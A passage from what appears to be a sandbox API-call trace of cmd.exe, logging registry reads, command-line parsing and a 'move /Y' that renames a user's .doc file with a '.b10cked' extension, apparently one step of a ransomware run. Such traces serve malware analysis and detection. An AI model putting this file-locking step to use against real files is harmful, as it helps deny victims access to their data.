lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegCloseKey (hKey=0x40) returned 0x0 [0139.479] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e95c | out: phkResult=0x26e95c*=0x40) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegCloseKey (hKey=0x40) returned 0x0 [0139.479] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.479] srand (_Seed=0x5b88636e) [0139.479] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" [0139.479] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" [0139.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3019b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.480] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.480] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.480] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.480] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.480] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.480] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.480] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.480] GetEnvironmentStringsW () returned 0x3023a0* [0139.480] FreeEnvironmentStringsW (penv=0x3023a0) returned 1 [0139.480] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.480] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.480] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.480] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.480] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.480] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.481] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.481] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.481] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.481] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f728 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.481] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f728, lpFilePart=0x26f724 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f724*="Desktop") returned 0x18 [0139.481] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.481] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.481] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.481] GetEnvironmentStringsW () returned 0x302bc0* [0139.482] FreeEnvironmentStringsW (penv=0x302bc0) returned 1 [0139.482] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.482] GetConsoleOutputCP () returned 0x1b5 [0139.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.485] GetUserDefaultLCID () returned 0x409 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f868, cchData=128 | out: lpLCData="0") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f868, cchData=128 | out: lpLCData="0") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f868, cchData=128 | out: lpLCData="1") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.493] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.494] GetConsoleTitleW (in: lpConsoleTitle=0x2f0960, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.504] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.504] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.504] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.504] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.504] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.504] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.504] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.508] GetConsoleTitleW (in: lpConsoleTitle=0x26f560, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.516] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.516] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.516] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="SET") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.517] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.517] _wcsicmp (_String1="move", _String2="MD") returned 11 [0139.517] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.517] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.517] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.517] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.517] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.519] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.519] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f31c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f314, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f314*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.520] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0139.520] _wcsicmp (_String1="UZYEGR~1.DOC", _String2=".") returned 71 [0139.520] _wcsicmp (_String1="UZYEGR~1.DOC", _String2="..") returned 71 [0139.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr~1.doc")) returned 0x20 [0139.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3020f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.520] SetErrorMode (uMode=0x0) returned 0x0 [0139.520] SetErrorMode (uMode=0x1) returned 0x0 [0139.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", nBufferLength=0x104, lpBuffer=0x26eca4, lpFilePart=0x26ec8c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", lpFilePart=0x26ec8c*="UZYEGR~1.DOC") returned 0x48 [0139.520] SetErrorMode (uMode=0x0) returned 0x1 [0139.595] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0139.595] _wcsicmp (_String1="UZYEGR~1.DOC", _String2=".") returned 71 [0139.596] _wcsicmp (_String1="UZYEGR~1.DOC", _String2="..") returned 71 [0139.596] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr~1.doc")) returned 0x20 [0139.596] SetErrorMode (uMode=0x0) returned 0x0 [0139.596] SetErrorMode (uMode=0x1) returned 0x0 [0139.596] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", nBufferLength=0x104, lpBuffer=0x26f120, lpFilePart=0x26eeb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", lpFilePart=0x26eeb8*="UZYEGR~1.DOC") returned 0x48 [0139.596] SetErrorMode (uMode=0x0) returned 0x1 [0139.596] SetErrorMode (uMode=0x0) returned 0x0 [0139.596] SetErrorMode (uMode=0x1) returned 0x0 [0139.596] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", nBufferLength=0x104, lpBuffer=0x26f328, lpFilePart=0x26eeb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", lpFilePart=0x26eeb8*="UzyEGr8akjufgS.doc.b10cked") returned 0x56 [0139.596] SetErrorMode (uMode=0x0) returned 0x1 [0139.596] SetLastError (dwErrCode=0x0) [0139.596] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc.b10cked")) returned 0xffffffff [0139.596] GetLastError () returned 0x2 [0139.596] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x26e834, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e834) returned 0x302300 [0139.597] FindNextFileW (in: hFindFile=0x302300, lpFindFileData=0x26e834 | out: lpFindFileData=0x26e834) returned 0 [0139.597] GetLastError () returned 0x12 [0139.597] FindClose (in: hFindFile=0x302300 | out: hFindFile=0x302300) returned 1 [0139.599] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x301e90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301e90) returned 0x302300 [0139.600] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", nBufferLength=0x104, lpBuffer=0x26eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", lpFilePart=0x0) returned 0x56 [0139.600] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc", nBufferLength=0x104, lpBuffer=0x26eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc", lpFilePart=0x0) returned 0x4e [0139.600] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc")) returned 0x20 [0139.600] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc.b10cked"), dwFlags=0x3) returned 1 [0139.600] FindClose (in: hFindFile=0x302300 | out: hFindFile=0x302300) returned 1 [0139.601] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea80 | out: _Buffer=" 1") returned 9 [0139.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.601] GetFileType (hFile=0x7) returned 0x2 [0139.601] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea0c | out: lpMode=0x26ea0c) returned 1 [0139.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.601] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea40 | out: lpConsoleScreenBufferInfo=0x26ea40) returned 1 [0139.602] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0139.602] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0139.602] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea64*=0x1a) returned 1 [0139.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.603] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.603] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.603] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.603] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.603] SetConsoleInputExeNameW () returned 0x1 [0139.603] GetConsoleOutputCP () returned 0x1b5 [0139.603] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.608] SetThreadUILanguage (LangId=0x0) returned 